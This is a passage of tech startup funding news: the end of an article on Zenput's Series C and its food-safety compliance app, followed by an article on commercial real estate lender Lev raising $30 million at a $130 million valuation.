Greg Gretsch, founding partner and managing director at Jackson Square Ventures, led Zenput’s Series A round in 2016 and had met Rikhter a year prior. At the time, Rikhter was in the early stages of developing what Gretsch called an organization task manager. While he didn’t invest then, he kept in touch with Rikhter and saw “how much of a grinder he was” in expanding the platform.

“When he sees a problem, he works and works to solve it,” Gretsch said. “Whenever you have a multilocation business, you have a remote management problem. You’re trying to manage everything so your weakest link can perform as best as the best link, but you need a platform to manage that so that you can hold stores accountable to improve the end product.”

Front-line workers use Zenput’s mobile app for onboarding at the beginning of the day and to track safety compliance and fresh food checks, something Rikhter said was historically challenging once a business had thousands of locations. The app can also alert when food has been left out too long to assist in lowering food waste rates.

Since its founding in 2012, Zenput is currently used by customers like Chipotle, Domino’s, P.F. Chang’s, Five Guys, Smart & Final and 7-Eleven in over 60,000 locations across more than 100 countries.

The Series C round comes as the company saw 100% revenue growth over the past year. At the same time, product usage more than doubled at stores, and to date, 1.5 billion questions were answered through Zenput, a figure Rikhter expects to double over the next 12 months as locations aim to find ways to do more things remotely.

“The pandemic inadvertently helped us,” he added. “Initially, it was rough, but then a lot of the brands we dealt with needed to expedite technology and saw an opportunity to invest in our technology. We have more products coming because there is more that can be done to make sure every meal is a safe meal.”

Much of the new funding will go toward building those new products and capabilities and into marketing to expand the customer base. The company recently launched an expansion of its Zenput for Franchisors tool and updates to its food prep labeling and temperature monitoring functions.

Rikhter also plans to double Zenput’s employees over the 16 to 18 months, especially in the product engineering and marketing areas.

All of that is to be ready for customer demand as restaurants, convenience stores and grocery chains do more to change up the way they do business in the future.

“I wouldn’t be surprised to show up at a restaurant and see changes made daily on protocols, which will drive a lot more of the journey than before,” Rikhter said. “We see more operators flexing muscles they didn’t know they had, as it relates to promotions and products, so they can grow faster and run totally different operational features and offer more options for customers.”

 

Commercial real estate lending startup Lev brings in $30M on a $130M valuation

Commercial real estate has been slow to embrace technology; though it has an addressable financing market of more than $40 billion, putting together a deal is still mostly manual, paper-heavy and complicated.

New York-based Lev is taking on this problem by automating workflows online and gathering hundreds of millions of data points into machine learning software to ensure financing accuracy. To do this, the commercial real estate financing transaction platform raised $30 million to give it a $130 million valuation just two years into its inception.

The latest financing comes four months after the company raised $10 million in seed funding led by NFX. Greenspring led the latest round, with participation from First American Title. Existing investors NFX, Canaan Partners, JLL Spark, Animo Ventures and Ludlow Ventures also joined in to give Lev total investments of more than $34 million, according to Crunchbase data.

Lev founder and CEO Yaakov Zar previously co-founded Boston-based Dispatch, which built tools for home services businesses. It was when he and his wife went through the homebuying process — and their mortgage fell through — that Zar decided to look at real estate financing.

He channeled his frustration into becoming a licensed mortgage loan originator. After relocating to New York, Zar was helping a friend at a nonprofit organization refinance their building and got a firsthand look at what he said was a fragmented commercial real estate mortgage industry.

Companies like Blend are addressing the problem of real estate lending, Zar told TechCrunch, but very few are focusing on commercial real estate, where lending is sensitive to interest rates and total amortization. In addition, property owners have a burden of refinancing every five to 10 years.

“Legacy businesses like JLL, which is an investor, Cushman Wakefield and CBRE work on lending, but they are much more ‘relationship focused’ than tech focused,” Zar said. “We think that it is a necessary part because the deals are so large and complex that you need a relationship for them, but transactions less than $1 billion are pretty straightforward. On experience and product, no one is close to us.”

Initially, Zar and his team wanted to build the “Rocket Mortgage of commercial real estate lending,” but found that to be difficult because real estate brokers are putting together their own pitch books for lenders. Instead, Lev is building a technology platform of more than 5,000 lenders with information on what projects they like to finance. It then analyzes a customer’s portfolio and connects them in minutes with the right lender, taking 1% of the loan amount for each transaction as payment. Lev is also working to be able to close deals online.

Zar wasn’t looking for funding when he was approached by investors, but said he was introduced to some people who liked the company’s growth and trajectory and decided to accept the funding offer.

He intends to use the new funding on product development, with the aim of giving a term sheet in seconds and closing a loan in seven days. Right now it can take a week or two to get the term sheet and 45 to 90 days to close a loan.

The company has about 40 employees currently in its New York headquarters, Miami R&D center, Los Angeles outpost and remotely. Continued investments will be made to expand the team.

Lev grew 10 times in volume in the past year, closing approximately $100 million of loans in 2020. Zar expects to close over $1 billion in 2021.

“Customers come back to us repeatedly, and there are a ton of referrals,” Zar said. “We want to be the platform on which capital market transactions are processed. You need an advantage to network and find great deals. I don’t want to mess with that, but when you find it, bring it to us, we will close it and provide the asset management with the best option to close online and manage the deal from a single platform.”

Meanwhile, Pete Flint, general partner at NFX, told TechCrunch that he got to know the Lev team over the last 18 months, checking in on the company during various stages of the global pandemic, and was impressed at how the company navigated it.

As co-founder of Trulia, he saw firsthand the problems in the real estate industry over search and discovery, but as that problem was being solved, the focus shifted to financing. NFX is also an investor in Tomo and Ribbon, which both focus on residential financing.

Wanting to see what opportunities were on the commercial real estate side, Flint heard Lev’s name come up more and more among brokers and industry insiders.

“As we got to know the Lev team, we recognized that they were the best team out there to solve this problem,” Flint said. “We are also among an amazing group of people complementing the round. The folks that are deep industry insiders will put a helpful lens on strategy and business development opportunities.”